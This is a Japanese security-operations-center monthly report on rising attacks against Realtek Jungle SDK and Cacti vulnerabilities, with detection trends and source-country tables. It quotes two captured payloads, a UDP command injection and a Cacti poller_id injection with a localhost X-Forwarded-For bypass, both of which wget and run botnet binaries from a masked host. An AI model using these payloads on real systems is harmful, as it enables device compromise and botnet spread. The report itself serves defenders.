2023年4月度 MBSD-SOCの検知傾向トピックス
Realtek社製チップセット「Realtek Jungle SDK」および運用監視ソフト「Cacti」の脆弱性を狙った通信
今月は、Realtek社製チップセット「Realtek Jungle SDK」の脆弱性(CVE-2021-35394)および運用監視ソフト「Cacti」の脆弱性(CVE-2022-46169)を狙った攻撃が増加しました。
下図は1月から4月までに検知した両製品の脆弱性を狙った攻撃の検知数推移です。両製品は、以前からボットネットマルウェアの標的にされており、弊社SOCでは断続的に攻撃を観測していましたが、3月下旬以降に攻撃が増加しました。
なお、Cactiの脆弱性は、2月に米国のサイバーセキュリティ・インフラストラクチャセキュリティ庁(CISA)が積極的に悪用されている脆弱性として、KEV(Known Exploited Vulnerabilities Catalog)へ追加し、注意喚起を促しています。
- Realtek Jungle SDKの脆弱性(CVE-2021-35394)を狙った攻撃
以下は、弊社SOCで実際に検知した攻撃パケットペイロードです。9034/udpポート宛への通信となっており、wgetコマンドにより不正なファイルをダウンロードして実行を試みた通信となっております。
図. Realtek Jungle SDKの脆弱性(CVE-2021-35394)を狙った攻撃検知例
| orf; cd /tmp; rm -rf sora.mpsl; /bin/busybox wget http://xxx.xxx.xxx.xxx/bins/sora.mpsl; chmod +x sora.mpsl; ./sora.mpsl realtek; |
- Cactiの脆弱性(CVE-2022-46169)を狙った攻撃
以下は、弊社SOCで実際に検知した攻撃パケットペイロードです。「remote_agent.php」のパラメータ「poller_id」に対して、wgetコマンドにより不正なファイルをダウンロードして実行を試みた通信となっています。
図. Cactiの脆弱性(CVE-2022-46169)を狙った攻撃検知例
GET /remote_agent.php?action=polldata&local_data_ids%5B0%5D=1&host_id=1&poller_id=;cd+/tmp;rm+-rf+*;wget+http://xxx.xxx.xxx.xxx/bins/Paralysis.arm;chmod+777+Paralysis.arm;/tmp/Paralysis.arm+cacti HTTP/1.1
Host: example.com
User-Agent: python-requests/2.27.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
X-Forwarded-For: 127.0.0.1 |
なお、4月におけるRealtek Jungle SDKおよびCactiの脆弱性を狙った通信の攻撃元国の上位5件は以下の通りです。
表. 攻撃元国上位5件(2023年4月)
| # |
Realtek Jungle SDKの脆弱性
(CVE-2021-35394) |
Cactiの脆弱性(CVE-2022-46169) |
| 1 |
オランダ |
32.4% |
アメリカ |
57.7% |
| 2 |
アメリカ |
30.3% |
フランス |
25.6% |
| 3 |
ルクセンブルク |
19.1% |
日本 |
6.4% |
| 4 |
スウェーデン |
10.0% |
中国 |
2.6% |
| 5 |
ブルガリア |
5.7% |
スウェーデン |
1.3% |
参考情報
- Realtek Jungle SDKの脆弱性(CVE-2021-35394)
- Cactiの脆弱性(CVE-2022-46169)
